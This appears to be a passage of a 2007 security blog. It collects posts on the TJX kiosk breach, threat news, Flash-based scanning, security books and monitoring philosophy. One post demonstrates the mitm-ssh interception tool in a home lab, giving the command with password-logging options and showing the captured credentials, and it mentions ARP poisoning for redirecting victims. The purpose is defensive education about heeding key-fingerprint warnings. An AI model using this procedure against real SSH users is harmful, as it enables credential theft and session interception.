Poorly secured in-store computer kiosks are at least partly to blame for acting as gateways to the company's IT systems, InformationWeek has learned. According to a source familiar with the investigation who requested anonymity, the kiosks, located in many of TJX's retail stores, let people apply for jobs electronically but also allowed direct access to the company's network, as they weren't protected by firewalls. "The people who started the breach opened up the back of those terminals and used USB drives to load software onto those terminals," says the source. In a March filing with the Securities and Exchange Commission,TJX acknowledged finding "suspicious software" on its computer systems.

The USB drives contained a utility program that let the intruder or intruders take control of these computer kiosks and turn them into remote terminals that connected into TJX's networks, according to the source. The firewalls on TJX's main network weren't set to defend against malicious traffic coming from the kiosks, the source says. Typically, the USB drives in the computer kiosks are used to plug in mice or printers. The kiosks "shouldn't have been on the corporate LAN, and the USB ports should have been disabled," the source says.


You can expect me to advocate detection and rapid response, and I'm curious what this will produce: DARPA seeks innovations in network monitoring. Why isn't it "innovations in stopping attacks?" Because that doesn't work.

Speaking of Bad Guys

I wanted to bring a few threat-oriented stories to your attention if you hadn't seen them. I'm also recording them here because I abhor bookmarks.

It's important to remember that we're fighting people, not code. We can take away their sticks but they will find another to beat us senseless. An exploit or malware is a tool; a person is a threat.

Dark images like the alley on the right first described in Analog Security is Threat-Centric remind us how dangerous the Internet can be to our data, and potentially our lives.

  • Report: Web 'Mean Streets' Pervasive: This is a story about a great new Honeynet Project report on Malicious web Servers. From the news story:

    If you still think avoiding risky sites keeps you safe on the Web, think again: Newly released research from the Honeynet Project & Research Alliance shows that even seemingly "safe" sites can infect you...

    The Honeynet Project also found that IE6 SP2 was the most likely browser version to get infected, versus Firefox 1.5.0 and Opera 8.0.0, so it really is safer to use one of these less-targeted browsers, according to the report.


    No one is safe, but survival rates increase when you differentiate yourself from the herd.

  • Newsmaker: DCT, MPack developer: So you want to know about the sorts of people feeding those malicious Web sites? Read this interview:

    [Question:] How do you get the exploits for MPack? Do you buy them?

    [Answer:] For our pack, there are two main methods of receiving exploits: The first one is guys sending us any material they find in the wild, bought from others or received from others; the second one is analyzing and improving public reports and PoC (proof-of-concept code).

    We sometimes pay for exploits. An average price for a 0-day Internet Explorer flaw is US$10,000 in case of good exploitation.


    I love reading interviews with bad guys.

  • Happy Birthday ZDI!: Speaking of buying exploits, David Endler posted a very interesting report on the status of the Tipping Point Zero Day Initiative. I found some of the comments from his vulnerability sources interesting:

    Q.) Would you consider doing business with the "underground" for more money

    * Yes: 10% No: 90%

    Q.) If no, why not?

    * "A company already offered me to buy 0days for much more money but I declined this offer because I didn't know what they really wanted to do with that and at the end I don't think it will help to improve the security of the software industry."
    * "Although money wise it might be very tempting, legally and morally its not tempting at all, so No."
    * "At some point everybody could be bought, I guess. But that would have to be really a lot of more money. I will not work with criminals for ten, twenty or so times the money."
    * "I've thought about it, and got offers but no."


    I think these researchers have seen enough Sopranos episodes to know that when you start dealing with the criminal world, there's no getting out.

  • Even the hackers are nervous: John Borland from Threat Level writes:

    There's big money to be made by breaking into other computers these days, and digital mafias have long since stepped into the gap, replacing slipshod and amateur work with professional-grade coding. According to McAfee Avert Labs researcher Toralv Dirro, harvested credit card numbers are sold in batches of a thousand, for between $1 and $6 dollars for a U.S. card, or twice that for a British card...

    But everything will be fine as long as antivirus software is in place, right?

    Wrong, said researcher Sergio Alvarez. He demonstrated a debugging program that immediately found bugs in several different varieties of antivirus software, and said the same kind of problems were common throughout the industry.

    Most antivirus firms rush products out on tight deadlines, without the extremely sensitive debugging process that such critical software ought to have, he argued. That left virtually all security software open to attacks that take advantage of those bugs, opening a painful paradox for systems administrators.

    "The more you try to defend yourself, the more you're vulnerable to this kind of attack," Alvarez said.
    (emphasis added)

    That echoes the point I made in Black Hat USA 2007 Round-Up Part 2: Modern countermeasures applied to reduce vulnerability and/or exposure in many cases increase both vulnerability and exposure.

  • Malware: Serious Business: More great threat reporting:

    Speaking at DefCon 2007, Thomas Holt revealed the results of his study, "The Market for Malware." The study reflects research conducted over the last year on some 30 hacker forums and focuses on six of those forums, including those hosted in eastern Europe.

    "The idea was to go into the forums and find out how they work," says Holt...

    The average hackers' forum works much like a combination of eBay and a department store site, Holt reports...

    As sellers submit more workable exploits to testers and buyers, they build a reputation that makes it easier -- and more lucrative -- to sell their future exploits, Holt says...

    A typical exploit in a hacker forum can sell from less than $100 to more than $3,000, Holt says...

    Holt and his research team are about to embark on further study in which they will attempt to study the international market for exploits, and how the products themselves evolve as they are bought and sold.


    This is a side of the digital world hardly anyone sees, but it's there and we need to be aware of it.

  • Storm Worm's virulence may change tactics: Ninja Joe Stewart is interviewed and makes an interesting comment:

    From the number of infected machines he's found, Stewart estimates that the Storm botnet could comprise anywhere from 250,000 to 1 million infected computers. And that raises questions, along with eyebrows.

    "Why do you need a botnet that big?" he asks. "You don't need a million [infected computers] to send spam."


    Wow, someone is asking "why" for a change. Why indeed?

  • Cisco warns of critical IOS flaws: Yet more reasons to Monitor Your Routers.

  • Ten Things Your IT Department Won't Tell You: I was asked to comment on this article. You can already find The Surf At Work Page and HTTP-Tunnel (a "corporate" product!) or HTTPTunnel@JUMPERZ.NET. I disliked the tone of the article, but it's important for security people to recognize that the majority of the user base sees us as impediments and not knights in shining armor.

  • Back to School: Backpacks, Books & Bots: Finally, a reminder that universities tend to get hammered in the fall:

    The latest strategy is to make security a "cool" thing on campus. "I can't solve every possible contingency with technology," says Quinnipiac's Kelly, who is also adding IPSs to the network in the next few days. "This year, we're focusing on cultural issues with security-awareness training."

    That means making security more personal, so the students don't just pay lip service to warnings about opening suspicious emails, or put their birthdates and physical addresses on their Facebook sites. "If I say, 'you need to update your AV,' they will say they don't care," Kelly says. "But when I say you could lose your work or your identity, they perk up and listen more."

    Of course, it can be a challenge to make security "cool" in a place where self-control is constantly tempted by new freedoms, new technology, and loads of free time.

    "College students today think they are computer geniuses. But they don't know what they don't know," says Richard Bunnell, senior security engineer with MassMutual Financial Group, which has an outreach program with nearby universities in New England to raise security awareness.
    (emphasis added)

    I almost fell out of my chair when I read that last paragraph.

Loving the SSH

I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by the author here, talking about the site being a Ruby on Rails application. terminal23 has a few comments too.

How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.

Speaking of SSH, one of my Black Hat students brought a SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:

In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1

I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.

I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.

richard@neely:~$ ssh mitm-ssh@10.1.13.4
The authenticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub

Once I log in you can see the fingerprints for both keys.

Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh

..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN

Usage: mitm-ssh [option(s)]

Routes:
[:] - Static route to port on host
(for non NAT connections)

Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read

Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4
-n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli
-s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied

Now I connect to localhost to show the correct key entered into known_hosts.

richard@neely:~$ ssh localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to the list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686

richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub

Now I connect to localhost port 2222 where mitm-ssh is listening.

richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The authenticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri

I see the DSA key for localhost (legit) but a different RSA key. That's the mitm-ssh RSA key:

$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub

Here is how mitm-ssh sees the activity.

WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22

[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

[MITM] Connection from UNKNOWN:48216 closed

Here's some of the info collected. First, usernames and passwords.

$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

Now data from the client.

$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22

Odd, it didn't record anything there. Here's (some) data from the server.

...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...

That file shows data from client and server.

Incidentally, SSH v1 is disabled on 10.1.13.4:

richard@neely:/tmp$ ssh -1 10.1.13.14
Protocol major versions differ: 1 vs. 2

In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.

Change the Plane

Call me militaristic, but I love the History Channel series Dogfights. I hope the Air Force Academy builds an entire class around the series.

I just finished watching an episode titled "Gun Kills of Vietnam." The show featured two main engagements. Both demonstrated a concept I described in Fight to Your Strengths. In the first battle two A-1H Skyraiders (prop planes) shot down a MiG-17 (a jet) using their cannons. The Skyraiders survived their initial encounter with the MiG by out-turning it at low speeds. They made the MiG fight their fight, and the MiG lost.

In the second battle, an F-4 flown by pilot by Darrell "Dee" Simmonds and backseater George McKinney Jr. downed another MiG-17 using their gun. In that fight, the slower but more maneuverable MiG-17 was out-turning the F-4. In the show McKinney said a less experienced pilot would have fought the MiG's fight by trying to turn with the MiG, probably giving the MiG an opportunity to down the F-4 when the F-4 overshot the MiG. Instead, a highly skilled pilot would act differently. In Simmonds' words:

You can not turn with him... you have to get into another plane.

The "plane" in this case is geographic, not the actual fighter plane. The F-4 leaves the X-Y plane and enters Z, the vertical plane. Simmonds put the F-4 into a "high yo-yo." The image above shows the technique, which can also be seen at the Dogfights clips page. Coming out of the yo-yo put the F-4 right behind the MiG, allowing Simmonds to shoot it down.

Of course this made me think about digital security. We are constantly trying to fight the black hat's fight. We should instead "change the plane." What does this mean in actionable terms? I'm not sure yet. Obviously in air combat it's not about surviving the enemy onslaught and never shooting back. Maybe it's time security researchers concentrate on vulnerabilities in the tools used by intruders, like what the Shmoo Group presented at Def Con 13, e.g., multihtml exploit vulnerability advisory? Ideally law enforcement would be striking back for us, but we're still in Wild West mode until LEAs catch up. What do you think -- how could you change the plane?

Tuesday, August 14, 2007

Scanning with Flash

Thanks to Rsnake I learned of a proof of concept for Flash scanning.



I had to enable Javascript and have Adobe Flash installed. I used Firefox within Ubuntu 6.10. In the traffic you can see my host sending the following after finishing the three way handshake.

09:31:34.348028 IP 192.168.2.8.44235 > 10.1.13.4.21:
P 1:24(23) ack 1 win 1460
0x0000: 4500 004b 1f24 4000 4006 41d4 c0a8 0208 E..K.$@.@.A.....
0x0010: 0a01 0d04 accb 0015 f31e fbd2 a8ce 608e ..............`.
0x0020: 8018 05b4 df9f 0000 0101 080a 0018 e4f5 ................
0x0030: ea84 369b 3c70 6f6c 6963 792d 6669 6c65 ..6. 0x0040: 2d72 6571 7565 7374 2f3e 00 -request/>.

More to come, I'm sure.

On a related note, read Same-Origin Policy Part 1: Why we’re stuck with things like XSS and XSRF/CSRF by Justin Schuh and XSRF^2 by Dan Kaminsky.

Monday, August 13, 2007

Note from Black Hat on ARP Spoofing Malware

During my classes I mentioned seeing a post on malware that performs ARP spoofing to inject malicious IFRAMEs on Web pages returned to anyone browsing the Web on the same segment. I found it -- ARP Cache Poisoning Incident by Neil Carpenter.

Thanks to Earl Crane for taking the picture of a few ex-Foundstoners who met after the talk by Keith Jones and Rohyt Belani.

Thursday, August 09, 2007

Reviews on Managing Cybersecurity Resources and Security Metrics Posted

Thanks to my travel to USENIX Security this week I managed to read two great non-technial security books.

Amazon.com just posted my four star review of Managing Cybersecurity Resources. From the review:

Managing Cybersecurity Resources (MCR) is an excellent book. I devoured it in one sitting on a weather-extended flight from Washington-Dulles to Boston. MCR teaches security professionals how to think properly about making security resource allocation decisions by properly defining terms, concepts, and models. The only problem I have with MCR is the reason I subtracted one star: its recommended strategy, cost-benefit analysis, relies upon estimated probabilities of loss and cost savings that are unavailable to practically every security manager. Without these figures, constructing cost-benefit equations as recommended by MCR is impossible in practice. Nevertheless, I still strongly recommend reading this unique and powerful book.

I heavily cite passages in Managing Cybersecurity Resources because the book makes a lot of good points. I call this more of a "book report" instead of a "review" because I recorded thoughts that I want to carry into future debates. The book has plenty to say on "security ROI" (hint: it's cost savings / loss avoidance, just like I said earlier).

They also posted my five star review of Security Metrics. From the review:

I read Security Metrics right after finishing Managing Cybersecurity Resources, a book by economists arguing that security decisions should be made using cost-benefit analysis. On the face of it, cost-benefit analysis makes perfect sense, especially given the authors' analysis. However, Security Metrics author Andy Jaquith quickly demolishes that approach (confirming the problem I had with the MCR plan). While attacking the implementation (but not the idea) of Annual Loss Expectancy for security events, Jaquith writes on p 33 "[P]ractitioners of ALE suffer from a near-complete inability to reliably estimate probabilities [of occurrence] or losses." Bingo, game over for ALE and cost-benefit analysis. It turns out the reason security managers "herd" (as mentioned in MCR) is that they have no clue what else to do; they seek safety in numbers by emulating peers and then claim that as a defense when they are breached.

Speaking of USENIX, I managed to speak with my number one wise man, Marcus Ranum. He called my Black Hat posts "too optimistic." Heh. I also managed to speak with my number two wise man, Dan Geer. He was kind enough to sign my copy of Security Metrics (along with author Andy Jaquith and Mike Rothman, who lent us his Sharpie. Nice to meet you Mike!)

Wednesday, August 08, 2007

Must-Read Post on Virtualized Switches

While visiting Hoff's blog I saw his post VMware to Open Development of ESX Virtual Switches to Third Parties...Any Guess Who's First?. You must read this. The question I have, as with all new "features," is this: is visibility built in? Will I have access to a "virtual tap"? Can I trust it? We'll see.

Human Weapon

In FISMA Dogfights I mentioned my favorite show on the History Channel is Dogfights. A very close second, if not an equal, is the new series Human Weapon. I don't recall another regular television series devoted exclusively to martial arts. If you wonder why I bother posting about a martial arts show, see my post Fight to Your Strengths.

On a related subject, based on other stories in the security blogosphere, I expect to see a martial arts rumble at the next Black Hat in 2008. I better get my shoulder fixed and start training again.

CIO Magazine on IP Theft

CIO magazine, which features an impossible-to-navigate Web site but decent print version, published Hacked: The Rising Threat of Intellectual Property Theft and What You Can Do About It by Stephanie Overby. I liked these excerpts:

“There’s a ceiling on how much money can be made by stealing identities,” says Scott Borg, director and chief economist of the U.S. Cyber Consequences Unit, an independent nonprofit institute set up at the request of the federal government to examine the economic and strategic consequences of cyberattacks. “You can actually steal the business—its processes, its internal negotiating memos, its merchandising plans, all the information it uses to create value. That’s a very large payoff.”

I agree, but what's up with the USCCU Web site? I had to find an archive from February 2006 to see what this group does. Spend a little of that DHS money on a Web site, folks.

CIOs may be less aware of the threat to IP than to their systems, and therefore less prepared to protect the former. “Companies are thinking about worms and viruses, things that will not have very bad consequences and have always been wildly exaggerated,” says Borg. “Or they’re thinking about ID theft, which attracts a lot of attention, even though the number of cases is remarkably low.”

There’s a difference, too, in the systems an intruder looking for corporate secrets may target. IP thieves “won’t necessarily look at obvious financially sensitive areas,” says Borg, thereby escaping detection. “They may be looking at technical data, controls systems, automation software.” And the results of IP theft can be hard to see—a slow degradation of one’s competitive position in the market may easily be attributed to other, noncriminal factors.

Until recently, the most conclusive public evidence that sustained industrial espionage has taken place in cyberspace has come from the military. Titan Rain was “the most systematic and high-quality attack we have seen,” says Ira Winkler, author of, most recently, Zen and the Art of Information Security. Chinese hackers successfully breached hundreds of unclassified networks within the Department of Defense, its contractors and several other federal agencies. One Air Force general admitted at an IT conference last year that China had downloaded 10 to 20 terabytes of data from DoD networks.
(emphasis added)

Forget about "slow degradation." In some future war over the Taiwan Straight an American jet fighter is going to dogfight a Chinese plane and lose the battle because some sensitive design or technical data was stolen. This is a constant in warfare as I mentioned in my post FISMA Dogfights.

To defend against targeted attacks, Motorola uses traditional controls such as firewalls, intrusion detection tools, antivirus software and digital forensics—but with a difference. “We’re operating our information security toolkit with a counterintelligence mind-set,” says Boni [Motorola CIO]. Like the military, Boni assumes there’s an enemy looking for an advantage and it’s his job to outwit him. “Putting those tools together with an understanding of what is or could be of greatest interest to competitors allows a more granular focus on the data,” says Boni, “not just on the network.”

Bingo. CI is exactly right.

The thought process is no longer making sure nothing bad ever happens,” says DuBois [general manager of information security and infrastructure services security for Microsoft]. “There may be a bug in the Cisco code or someone might misconfigure a device. If [attackers] get at that chess piece we left unprotected, what will we do?”...

“If eternal vigilance is the price of freedom,” says Boni, paraphrasing Thomas Jefferson, “continuous monitoring and preparation to respond quickly is the cost associated with global digital commerce.”
(emphasis added)

Again, exactly right. Prevention Eventually Fails. Detection. Response. Hopefully more CIOs will pay attention.

Pervasive Security Monitoring

After Black Hat I've been thinking of how to address gaining insight into the security state of the enterprise. My first book addressed how to detect and response to intrusions using traffic sources in the form of network security monitoring. I've talked about gaining pervasive network awareness several times as well. Recently I've talked about security application instrumentation and several times over the years I've discussed why I am not anti-log.

I am beginning to formulate my thoughts on what I'm calling Pervasive Security Monitoring. I don't have a formal definition yet, but the concept will extend past NSM data sources (traffic) into reports on the state of platforms, OS, applications, and data. The dictionary definition, to become spread throughout all parts of, captures the concept fairly well at this stage.

I noticed Cisco and a few others used the term pervasive security awareness, but it's used as a way to encourage employees to become security conscious. That's not what I mean. I see pervasive security monitoring as a way to achieve pervasive security awareness, in the form of collecting data to inform the decision-making process.

I considered using the term "enterprise security monitoring," but I don't think that term as previously used covers everything I have in mind. As I develop these thoughts I will discuss them here.

Tuesday, August 07, 2007

Minneapolis Bridge Lessons for Digital Security

The Minneapolis bridge collapse is a tragedy. I had two thoughts that related to security.

  1. If the bridge collapsed due to structural or design flaws, the proper response is to investigate the designers, contractors, inspectors, and maintenance personnel from a safety and negligence perspective. Based on the findings architectural and construction changes plus new safety operations might be applied in the future. This is a technical and operational response.

  2. If the bridge collapsed due to attack, the proper response is to investigate, apprehend, proseceute, and incarcerate the criminals. Redesigning bridges to withstand bomb attack is unlikely. This is a threat reduction and deterrence response.


Do you agree with that assessment? If yes, why do you think response 1 (try to improve the "bridge" and similar operations) is the response to every digital security attack (i.e., case 2)? My short answer: everyone blames the victim, not the criminal.

The NTSB is on scene in Minneapolis with law enforcement to figure out if the bridge collapse was caused by scenario 1 or 2. Why don't we have a National Digital Security Board investigating breaches? My short answer: it's easier to hide a massive security breach than the destruction of any bridge, building, plane, or train.